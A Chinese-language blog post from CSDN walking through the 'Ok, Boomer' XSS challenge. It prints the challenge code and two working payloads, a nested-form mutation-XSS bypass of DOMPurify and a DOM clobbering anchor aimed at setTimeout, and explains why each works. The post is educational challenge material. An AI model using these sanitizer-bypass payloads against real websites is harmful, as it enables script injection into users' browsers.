Ok, Boomer

最新推荐文章于 2024-10-18 17:51:23 发布
最新推荐文章于 2024-10-18 17:51:23 发布
阅读量209 收藏 3
点赞数 3
分类专栏: XSS Game 文章标签: javascript 开发语言 ecmascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Thewei666/article/details/141288241
版权

目录

一、题目

二、思路

三、payload

3.1 方案一

3.2 方案二

 四、思考与总结

一、题目

<!-- Challenge -->
<h2 id="boomer">Ok, Boomer.</h2>
<script>
    boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")
    setTimeout(ok, 2000)
</script>

二、思路

DOMPurify是一个流行的JavaScript库,用于防止XSS攻击。该库由一个世界著名安全团队cure53维护,原理是利用白名单,将非白名单内的属性和标签全部过滤。

所以思路主体分为两类,要不绕过要不bypass

思路一:绕过,通过嵌套form循环的错误解析

思路二:DOM Clobbering

三、payload

3.1 方案一

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>

3.2 方案二

<a id="ok" href="javascript:alert(1)">

需要将题目中的Javascript:换成DOMPurify库中白名单(tel),因为并没有绕过它,所以直接使用Javascript:会被过滤

 四、思考与总结

DOMPurity的绕过,关键点在于它返回的序列化HTML不符合HTML规范,包含了嵌套FORM元素,所以导致浏览器解析出的DOM树是错误的,img标签直接创建在HTML空间中

DOM Clobbering的重点,在于对“ok”的覆盖,a标签的toString方法是不继承于父类的,它返回的值是href属性。所以直接href属性中编写执行函数即可,但是由于没有绕过DOMPruity,因此使用的协议需要是在它的白名单内。

魏大橙
关注
专栏目录
OK Boomer
知屋安砖
07-14 253
OK Boomer示例HTMLCSSJS 更多有趣示例 尽在小红砖社区 示例 HTML #wrap -3.times do .cube .front %h1{"data-splitting" => "chars"} OKBO .left %h1{"data-splitting" => "chars"} OMER .right %h1{"data-splitting" => "chars"} OMER .b
OK BOOMER
weixin_63264424的博客
08-18 181
1.DOMPurity的绕过,关键点在于它返回的序列化HTML不符合HTML规范,包含了嵌套FORM元素,所以导致浏览器解析出的DOM树是错误的,img标签直接创建在HTML空间中2.DOM Clobbering的重点,在于对“ok”的覆盖,a标签的toString方法是不继承于父类的,它返回的值是href属性。所以直接href属性中编写执行函数即可,但是由于没有绕过DOMPruity,因此使用的协议需要是在它的白名单内。
ok,boomer xss的dom破坏
xiaomi11133的博客
08-21 474
通过构造与setTimeout函数参数名相同的标签id,浏览器执行setTimeout函数时会查找HTML中id=ok的字符串类型的标签,而标签被调用时回一个表示标签的字符串即href属性中的值,因此setTimeout函数执行时会将标签中href属性的值tel:alert(1)当作代码来执行,利用该框架中白名单函数tel来执行。在HTML中,如果使用一些特定的属性名(id、name)给DOM元素命名,这些属性会在全局作用域中创建同名的全局变量,指向对应的DOM元素。
【locust】使用locust + boomer实现对接口的压测
weixin_30695195的博客
09-05 1528
背景 很早之前,考虑单机执行能力,使用locust做过公司短信网关的压测工作,后来发现了一个golang版本的locust,性能是python版本的5到10倍以上,但是一直没有机会使用。 最近公司想做一个性能测试平台,技术选型要求和开发语言一致,即golang,所以我想到了boomer,本文为boomer的使用记录。 环境安装 开发环境 安装 Python 3.7 略 ...
xss.pwnfunction-OkBoomer
weixin_63750160的博客
04-10 409
调用0k会直接调用tostring方法获得href里的内容而setTimeout第一个参数恰巧可以接收字符串。这里tel是dompurify框架的白名单。但是href必须是协议:主机名。
Boomer压测环境搭建(Windows)
Ho_mj的专栏
11-03 1670
python3.6 + locust 2.4.1 (Windows) 安装Python3.6, 压测工具: Loadrunner(付费) 、 Jmeter(配置方便)、 locust(更灵活,Python) 、 boomer (go实现locust的slave) 1. pip install 下载安装包的时候,镜像源是国外的, --timeout=200 设置超时时间,默认是15s --timeout <sec> Set the socket timeo...
2022年必备的加密行业术语大全,你了解有多少?
02-20 1210
2021 年出现了一些新的技术流行语,以反映不断变化的技术场景。以下是今年出现的一些词及其含义。 艺术品 NFT NFT 被柯林斯词典评为 2021 年的年度词汇。 NFT 是证明您拥有数字项目的证书,可以是视频、推文或模因的原始版本。它们可以是任何数字化的东西,但很多令人兴奋的地方都围绕着数字艺术。 他们通过在称为区块链的数字分类账中记录详细信息来确认物品的所有权,该分类账是公开的并存储在互联网上的计算机上,使其不可能丢失或销毁。 元宇宙 在 Facebook 将其母公司更名为 Meta,在虚拟世界中展示
prometheus函数_具有prometheus适配器的自动缩放无核函数
weixin_26716079的博客
10-09 458
prometheus函数As a part of the web ecosystem, our main concern is how to create an application that handles more, many more requests and how to keep it afloat. Am I wrong?作为网络生态系统的一部分,我们的主要关注点是如何创建一个处理更...
Locust性能评测及优化详解
上帝De助手
07-21 6299
文章目录Locust性能评测及优化详解性能评测环境准备1、压测环境准备2、服务环境准备3、压测工具准备压测开始LocustJmeterabhttp_load压测说明性能优化Locust优化项测试Locust默认是否为keep-alive替换为urllib3实现client替换为socket实现client替换为go实现client总结 Locust性能评测及优化详解 这篇文章是用来补前一篇文章挖...
Ok, Boomer.md
11-07
Ok, Boomer.md
DOMPurify XSS绕过探索:Ok, Boomer
"Ok, Boomer.md" 这篇内容讨论的是关于Web安全中的XSS(跨站脚本攻击)绕过策略,特别是针对DOMPurify这个知名的JavaScript库的防御措施。DOMPurify是一个用于清洗不安全的HTML、SVG或MathML内容的库,它的主要目的...
Android提供的系统服务之--SmsManager(短信管理器)
代码拾荒者
01-12 1202
Android提供的系统服务之--SmsManager(短信管理器)                                                                      --转载请注明出处:coder-pig SmsManager相关介绍以及使用图解: 当然为了方便各位,把代码粘一粘吧,就不用麻烦大
前端 js 处理一个数组 展示成层级下拉样式
lzfengquan的博客
10-17 260
前端开发中,不管是什么时候都会遇到select 下拉框的使用,一般情况下,数据处理后端都会处理好。前端一般使用相应技术栈所推荐的公共组件就可以了。前端处理的前提是要确定那个是父级元素,那个是子级元素,这样才能更好的处理数据。这个时候前端要写个方法去处理这个数组了。这个数组后端是会给的。
ECMAScript标准解析及其发展历史与技术演进
qq_20245171的博客
10-15 765
ECMAScript(简称ES)是由ECMA国际(欧洲计算机制造商协会)制定的一种脚本语言规范。它是JavaScript、JScript等语言的基础,并为现代Web开发提供了强大的支持。ECMAScript标准不仅定义了语言的语法和语义,还涵盖了数据类型、对象模型和执行环境等内容,极大推动了JavaScript语言的发展。本文将全面介绍ECMAScript标准的起源、各个版本的演变、关键特性以及未来趋势,深入探讨其对Web开发及编程语言设计的影响。
深入解析:React中的信号组件与细粒度更新
Fisher的专栏
10-15 809
介绍了前端大火的signal原理,引入AutoStore为React提供了信号组件,帮助实现细粒度更新
基于Java微信小程序的水果销售系统详细设计和实现(源码+lw+部署文档+讲解等)
源码好优多
10-16 934
请联系我获取更详细的演示视频。
2024 Bootstrap 秘籍:基础详解、实战案例与优化技巧
最新发布
weimengen的博客
10-18 647
本文介绍了使用 Bootstrap 构建网站的技巧。涵盖了 Bootstrap 的基础知识,包括响应式设计原理、HTML 结构、CSS 类作用和 JavaScript 插件。详细阐述了安装与使用方法、布局规划、组件选择及自定义样式等方面,并为每个知识点提供了丰富案例。掌握这些技巧,开发者能构建出高质量、美观且响应式的网站。
Js面向对象
sdgfafg_25的博客
10-16 1078
程序就是对现实世界的抽象,一个事物抽象到程序中后就变成了对象,在程序的世界中,一切皆对象面向对象的编程指,程序中的所有操作都是通过对象来完成做任何事情之前都需要先找到它的对象,然后通过对象来完成各种操作一个事物通常由两部分组成:数据和功能一个对象由两部分组成:属性和方法事物的数据到了对象中,体现为属性事物的功能到了对象中,体现为方法。
基于SpringBoot的冬奥会科普平台
weixin_53180424的博客
10-16 371
系统展示 【2024最新】基于Java+SpringBoot+Vue+MySQL的,前后端分离。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

魏大橙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值